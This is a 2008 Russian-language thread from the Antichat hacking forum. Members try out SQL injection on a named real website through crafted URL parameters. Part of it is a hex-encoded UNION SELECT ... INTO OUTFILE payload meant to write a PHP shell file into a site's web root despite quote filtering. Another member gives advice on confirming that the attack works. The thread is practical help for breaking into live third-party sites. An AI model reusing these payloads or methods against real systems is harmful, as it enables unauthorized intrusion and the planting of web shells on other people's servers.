HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #2161  
Старый 30.05.2008, 14:04
brasco2k
Постоянный
Регистрация: 23.11.2007
Сообщений: 342
Провел на форуме:
1215706

Репутация: 310
По умолчанию

Цитата:
Сообщение от AFoST  
Чёт не разберусь никак с одной скулей...Может кто справится!?
Код:
http://micropig.com/microlink/?srch=2&start=30&searchtext=ya.ru'
http://micropig.com/microlink/category/58/start/3'

помойму там жосткий фильтр стоит.
ничего у меня не получается.

ты уверен чот она там есть??


на это тоже ругается:

PHP код:
http://micropig.com/microlink/?srch=2&start=30&searchtext=123.d 
 

  #2162  
Старый 30.05.2008, 14:16
AFoST
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194

Репутация: 1934


Отправить сообщение для AFoST с помощью ICQ
По умолчанию

Цитата:
Сообщение от brasco2k  
помойму там жосткий фильтр стоит.
ничего у меня не получается.

ты уверен чот она там есть??


на это тоже ругается:

PHP код:
http://micropig.com/microlink/?srch=2&start=30&searchtext=123.d 
Как видишь, ошибка мускула есть логично предположить, что это инъекция Я вот тоже час парюсь, уже просто интересно стало, можно ли чего извлечь...

возможно это инъекция после лимита, т.к.
Код:
http://micropig.com/microlink/category/58/start/3,1,1,2 -error

http://micropig.com/microlink/category/58/start/3 offset 1 /* -no error
http://micropig.com/microlink/category/58/start/3,1/* -no error
 

  #2163  
Старый 30.05.2008, 14:18
Qwazar
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912

Репутация: 4693


По умолчанию

Я про этот случай:
http://micropig.com/microlink/?srch=2&start=30&searchtext=123'

Нет там иньекта, он ругается каждый раз когда не может чтото найти, например:

http://micropig.com/microlink/?srch=2&start=30&searchtext=123sdfsd
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.

Последний раз редактировалось Qwazar; 30.05.2008 в 14:21..
 

  #2164  
Старый 30.05.2008, 14:35
0nep@t0p
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429

Репутация: 728
По умолчанию

Ситуация такая, на серве мэджик квотес = он , то есть кавычки фильтруются, но можно провернуть скуль инъекцию, мне надо залить шелл ( файл прив есть, путь есть ), но как указать путь если он в кавычках ('/home/site/public_html/shell.php') ? Я помню, что Scipio писал как это можно обойти, но я тогда не врубился, может кто объяснит ?
 

  #2165  
Старый 30.05.2008, 14:48
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

AFoST
Наличие ошибки не означает наличие инъекции. Инъекция это возможность влиять на запрос
Сдесь:
_http://micropig.com/microlink/?srch=2&start=30&searchtext=123
такой возможности нет
Сдесь:
_http://micropig.com/microlink/category/58/start/3
тройка это limit 3 т.е. можно повлиять так как ты описал:
_http://micropig.com/microlink/category/58/start/3,1/*
limit 3 offset 1(offset по умолчанию = 37)
Но ничего путного от этой инъекции (в mysql) не добиться
 

  #2166  
Старый 30.05.2008, 14:51
l-l00K
Leaders of Antichat - Level 4
Регистрация: 26.11.2006
Сообщений: 237
Провел на форуме:
13395217

Репутация: 2097
По умолчанию

0nep@t0p
Скинь сюда сайт, чтобы метод Scipio работал данные из первого запроса должны попадать во второй, тогда будет возможность залить шелл
__________________
Не занимаюсь коммерцией в любых ее проявлениях.
 

  #2167  
Старый 30.05.2008, 15:30
0nep@t0p
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429

Репутация: 728
По умолчанию

2 l-l00K
Запрос такой:
-16+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19/*
То есть мне надо составить такой запрос - -16+union+select+1,0x2D313620756E696F6E2073656C6563 7420273C3F70687020706870696E666F28293B203F3E2C3220 66726F6D206D7973716C2E7573657220696E746F206F757466 696C6520272F686F6D652F736974652F7075626C69635F6874 6D6C2F7368656C6C2E706870272F2A,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19/*
Где в хексе прописано - -16 union select '<?php phpinfo(); ?>,2 from mysql.user into outfile '/home/site/public_html/shell.php'/*
Правильно ?
 

  #2168  
Старый 30.05.2008, 15:37
l-l00K
Leaders of Antichat - Level 4
Регистрация: 26.11.2006
Сообщений: 237
Провел на форуме:
13395217

Репутация: 2097
По умолчанию

А ты уверен что данные из 2-рого поля попадают в другой запрос и что в другом запросе 2 поля? Если это так, то по сюжету должно прокатить
__________________
Не занимаюсь коммерцией в любых ее проявлениях.
 

  #2169  
Старый 30.05.2008, 15:42
0nep@t0p
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429

Репутация: 728
По умолчанию

Хмм, а как определить попадают ли данные из второго поля в другой запрос и сколько в другом запросе полей ? Scipio об этом ничего не писал
 

  #2170  
Старый 30.05.2008, 15:46
l-l00K
Leaders of Antichat - Level 4
Регистрация: 26.11.2006
Сообщений: 237
Провел на форуме:
13395217

Репутация: 2097
По умолчанию

Подставь 0x27 по очереди в каждое поле, если появится ошибка, значит попадают, разумеется если вывод ошибок не выключен
__________________
Не занимаюсь коммерцией в любых ее проявлениях.
 
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ